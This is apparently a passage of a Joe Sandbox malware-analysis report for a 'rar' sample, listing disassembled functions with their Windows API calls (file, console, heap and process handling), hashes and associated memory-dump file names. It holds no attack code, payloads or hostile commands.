Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CriticalSection$EnterEventLeave
String ID:
API String ID: 3094578987-0
Opcode ID: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction ID: 8f69bee09e6639f1d5285733a4c6833c1994566eaa0b6a838be23eb9603b7b4b
Opcode Fuzzy Hash: 8fe9f8176e207c020d906139d049f12966b7ba6a10f6a81758c5b7eb42f71044
Instruction Fuzzy Hash: 99F08622628B6683DA609F21F54407D6360FF99B98F244230FE9D47669DF2CD5499B00

Function 00007FF60E5D7B44 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetStdHandle.KERNEL32(?,?,?,00007FF60E5D7A9E), ref: 00007FF60E5D7B4A
GetFileType.KERNELBASE(?,?,?,00007FF60E5D7A9E), ref: 00007FF60E5D7B56
GetConsoleMode.KERNEL32(?,?,?,00007FF60E5D7A9E), ref: 00007FF60E5D7B69

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ConsoleFileHandleModeType
String ID:
API String ID: 4141822043-0
Opcode ID: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction ID: ac24ca338752e0f4e8e21379bc6740fde72a87b27b7c4a2db9773b3c299c900e
Opcode Fuzzy Hash: b15bfddebd279c5c829c27adb93723b3551ef5d7968acfa0ad204a509e36213f
Instruction Fuzzy Hash: 60E0C224F2861353FFA84731B8651784251DF7DB80F601074F80FCA350EE2DD4898300

Function 00007FF60E622488 Relevance: 4.5, APIs: 3, Instructions: 19COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,00007FF60E62246C), ref: 00007FF60E6224B0
TerminateProcess.KERNEL32(?,?,?,00007FF60E62246C), ref: 00007FF60E6224BB
ExitProcess.KERNEL32 ref: 00007FF60E6224CA

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Process$CurrentExitTerminate
String ID:
API String ID: 1703294689-0
Opcode ID: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction ID: bfad871db795b648586c4a2a0933437805fa0a16156b6f1ecfbee3d351f8605f
Opcode Fuzzy Hash: dc222732d609072635a32a4c442b917d442ee89fc7b927a0b9cfc4e365035d5e
Instruction Fuzzy Hash: 26E09224E24B6582EA54AB75A95537913526F74741F20543CFC0E863E3CE3DA84D9350

Function 00007FF60E5E4044 Relevance: 3.3, APIs: 2, Instructions: 336COMMON

Download Yara Rule

APIs

OemToCharA.USER32 ref: 00007FF60E5E4255
ExpandEnvironmentStringsW.KERNEL32(?,?,00000000,?,?,?,?,?,00007FF60E5C6CD9), ref: 00007FF60E5E447C

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CharEnvironmentExpandStrings
String ID:
API String ID: 4052775200-0
Opcode ID: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
Instruction ID: 2dfe562cf5b0a5fbc5c85fed3e087d3baefc20bef9c7c1d403deaa7232d6d673
Opcode Fuzzy Hash: fcc6bb39599084807c43192b89aab19ff5ae85cc802a468cbb490d5049967146
Instruction Fuzzy Hash: 9FE1F722E18AA285EB368F60D4201BD67A1FB60790F644531FBAD877D9EF7DD481C700

Function 00007FF60E5E1AF0 Relevance: 3.1, APIs: 2, Instructions: 85fileCOMMON

Download Yara Rule

APIs

CreateFileW.KERNELBASE(?,?,00000800,?,00000000,00007FF60E5D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF60E5D7C48), ref: 00007FF60E5E1B8D
CreateFileW.KERNEL32(?,?,00000800,?,00000000,00007FF60E5D7EBE,00000000,00000000,00000000,00000000,00000007,00007FF60E5D7C48), ref: 00007FF60E5E1BD7

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction ID: 772afb983c42c498b4fa5dcbcacceb23078ffc0e8f6dd6ec4310f71698080fe2
Opcode Fuzzy Hash: 4219d35e49beb692727e1c809157a61a389fcef5d2ea993dee933b1b68bc62b7
Instruction Fuzzy Hash: C7315363A28A9546F7718F20E4143B926A0EB60BB8F204334FEAC873C5EF7DC4858700

Function 00007FF60E5C681C Relevance: 3.1, APIs: 2, Instructions: 75COMMON

Download Yara Rule

APIs

std::bad_alloc::bad_alloc.LIBCMT ref: 00007FF60E5C68AE
_CxxThrowException.LIBVCRUNTIME ref: 00007FF60E5C68BF

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ExceptionThrowstd::bad_alloc::bad_alloc
String ID:
API String ID: 932687459-0
Opcode ID: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction ID: 22dcd2026b9895c566e60ecab5102c280ccf8b86f8be916925de34dbb2b303b0
Opcode Fuzzy Hash: e0b6576285a1405d5c99e18f7cacf33152f7ca5f18a954e7e6124ed6b2dff56f
Instruction Fuzzy Hash: 0E215453A18E9582EB01CF29D5610B86360FBACF88B18A725EF5D43656EF28E5E5C300

Function 00007FF60E5F915C Relevance: 3.1, APIs: 2, Instructions: 51COMMON

Download Yara Rule

APIs

new.LIBCMT ref: 00007FF60E5F91CA
new.LIBCMT ref: 00007FF60E5F91F2

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 40d17529f56f4ffcfc3be8fdb8ce4568d85ee55ceb8ce58a21b5fc4023b9d816
Instruction ID: a295dd522f0a3738dcc60ff30b38444a587a1b3be0ef7c0db1f2da6e67cdb52e
Opcode Fuzzy Hash: 40d17529f56f4ffcfc3be8fdb8ce4568d85ee55ceb8ce58a21b5fc4023b9d816
Instruction Fuzzy Hash: F111B63190AF9181EB16EB94A5103B972A4EFA47D0F380A38F69D877E6DE7DD151C300

Function 00007FF60E5E20B4 Relevance: 3.0, APIs: 2, Instructions: 45COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE(?,?,?,00007FF60E5E22EE), ref: 00007FF60E5E211B
GetLastError.KERNEL32(?,?,?,00007FF60E5E22EE), ref: 00007FF60E5E2126

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction ID: 0c4a1b6afd2475698ecc17734d88dff12d75994544638167d8e2a427f7adb635
Opcode Fuzzy Hash: 5815bd41f5973e06c2119053be911941aef37d92954e301d013d2bb4fe8795dc
Instruction Fuzzy Hash: B5012925E19AB142EA6D4B26A5104386355EF64BF0F345B30FA2D83BE8DE3ED4418700

Function 00007FF60E5D7A68 Relevance: 3.0, APIs: 2, Instructions: 40COMMON

Download Yara Rule

APIs

setbuf.LIBCMT ref: 00007FF60E5D7A7B

Part of subcall function 00007FF60E622AE4: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60E627EF3

setbuf.LIBCMT ref: 00007FF60E5D7A8F

Part of subcall function 00007FF60E5D7B44: GetStdHandle.KERNEL32(?,?,?,00007FF60E5D7A9E), ref: 00007FF60E5D7B4A
Part of subcall function 00007FF60E5D7B44: GetFileType.KERNELBASE(?,?,?,00007FF60E5D7A9E), ref: 00007FF60E5D7B56
Part of subcall function 00007FF60E5D7B44: GetConsoleMode.KERNEL32(?,?,?,00007FF60E5D7A9E), ref: 00007FF60E5D7B69

Part of subcall function 00007FF60E622ABC: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60E622AD0

Part of subcall function 00007FF60E622B40: _invalid_parameter_noinfo.LIBCMT ref: 00007FF60E622C1C

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: _invalid_parameter_noinfo$setbuf$ConsoleFileHandleModeType
String ID:
API String ID: 4044681568-0
Opcode ID: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
Instruction ID: b3ad6e42aaf55abcd4f60ccf2828eb00aec237998863148f08a95aea8056a465
Opcode Fuzzy Hash: 8727ae0c8f4e6654f39e3312ee4fd5538b937ba58b7f1081e43b9e7840c2ab2c
Instruction Fuzzy Hash: 52012500E2E5A206FA29B3B574B23B958428FB5314F20853EF41D8A7E3DD1D6806A311

Function 00007FF60E5E2440 Relevance: 3.0, APIs: 2, Instructions: 37COMMON

Download Yara Rule

APIs

SetFilePointer.KERNELBASE ref: 00007FF60E5E2480
GetLastError.KERNEL32 ref: 00007FF60E5E248D

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ErrorFileLastPointer
String ID:
API String ID: 2976181284-0
Opcode ID: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction ID: 897fef7a6470152b22f38607112df888e3f6c5ac089d1a0c5fae95cd4c2a052d
Opcode Fuzzy Hash: 3cdbc9fc115b3786672d0ab875eb06079944196e3b63107a1cba7715dce50020
Instruction Fuzzy Hash: 12018E36A18B9282EB69AB29E4543686360EB60778F344B31F13D812F9DF3DD586C700

Function 00007FF60E5E30C8 Relevance: 3.0, APIs: 2, Instructions: 30COMMON

Download Yara Rule

APIs

GetFileAttributesW.KERNELBASE(00000800,00007FF60E5E305D,?,?,?,?,?,?,?,?,00007FF60E5F4126,?,?,?,?,00000800), ref: 00007FF60E5E30F0
GetFileAttributesW.KERNELBASE(?,?,?,?,?,?,?,?,00007FF60E5F4126,?,?,?,?,00000800,00000000,00000000), ref: 00007FF60E5E3119

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: AttributesFile
String ID:
API String ID: 3188754299-0
Opcode ID: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction ID: f96c3b49a203226d4850265b125aa996a2e649032aa4c1fe9c7322469c6a0d5f
Opcode Fuzzy Hash: 2e2186a7cb8ede8c780016636985b78a342ec6e28c4d5099e5617c1395310ad3
Instruction Fuzzy Hash: 17F0C221B28A9182EAA09BA4F4543B963A0BF5C7D4F500531FA9CC379ADF6CD5849B00

Function 00007FF60E60B3F0 Relevance: 3.0, APIs: 2, Instructions: 28libraryCOMMON

Download Yara Rule

APIs

GetSystemDirectoryW.KERNEL32(00000000,00007FF60E607F72), ref: 00007FF60E60B41E
LoadLibraryExW.KERNELBASE ref: 00007FF60E60B449

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: DirectoryLibraryLoadSystem
String ID:
API String ID: 1175261203-0
Opcode ID: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction ID: fac5a96e22414a53f914ca2ec2590f195157193c9e1cef59b15d2c2ac12c796c
Opcode Fuzzy Hash: 690506ff7ad01b68561af502f5f6bdd4c4444b6941644f14759842c93308c1c9
Instruction Fuzzy Hash: 64F06221B3859142FA709B60F8153FA6264BFA8784F904031F9CDC26A9EE2CD2489A10

Function 00007FF60E60BA70 Relevance: 3.0, APIs: 2, Instructions: 23COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(?,?,?,?,00007FF60E60BACD), ref: 00007FF60E60BA74
GetProcessAffinityMask.KERNEL32 ref: 00007FF60E60BA87

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: Process$AffinityCurrentMask
String ID:
API String ID: 1231390398-0
Opcode ID: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction ID: d936b3dec4c8ca4c2b44436e619013a09410f8265ce19a5e58218de746fb13e4
Opcode Fuzzy Hash: b5cb634e91c6557fc3f51b2270fa7b26469bd4cc2c85bb60b503b74b5f948de9
Instruction Fuzzy Hash: B1E0D161B3457147DBD85769E495FAD1390EF64B80F906035F40FC3B54DD1DD5489B00

Function 00007FF60E624A74 Relevance: 3.0, APIs: 2, Instructions: 19memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlFreeHeap.NTDLL ref: 00007FF60E624A8A
GetLastError.KERNEL32 ref: 00007FF60E624A9C

Memory Dump Source

Source File: 0000006E.00000002.2556687803.00007FF60E5C1000.00000020.00000001.01000000.00000021.sdmp, Offset: 00007FF60E5C0000, based on PE: true

Associated: 0000006E.00000002.2556651835.00007FF60E5C0000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556790986.00007FF60E630000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556838085.00007FF60E648000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556873753.00007FF60E649000.00000008.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E64A000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E654000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E65E000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2556913479.00007FF60E666000.00000004.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557049213.00007FF60E668000.00000002.00000001.01000000.00000021.sdmpDownload File
Associated: 0000006E.00000002.2557085767.00007FF60E66E000.00000002.00000001.01000000.00000021.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_110_2_7ff60e5c0000_rar.jbxd

Similarity

API ID: ErrorFreeHeapLast
String ID:
API String ID: 485612231-0
Opcode ID: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
Instruction ID: d61b8b8185d411dd58f58b6ed07352c5e1e58ee307feb65514f632e2d9aaccc8
Opcode Fuzzy Hash: eba7cb3a1b25fa9ccf71865f2d4f1c33426d57f6117c222b9e149abc10e1791e
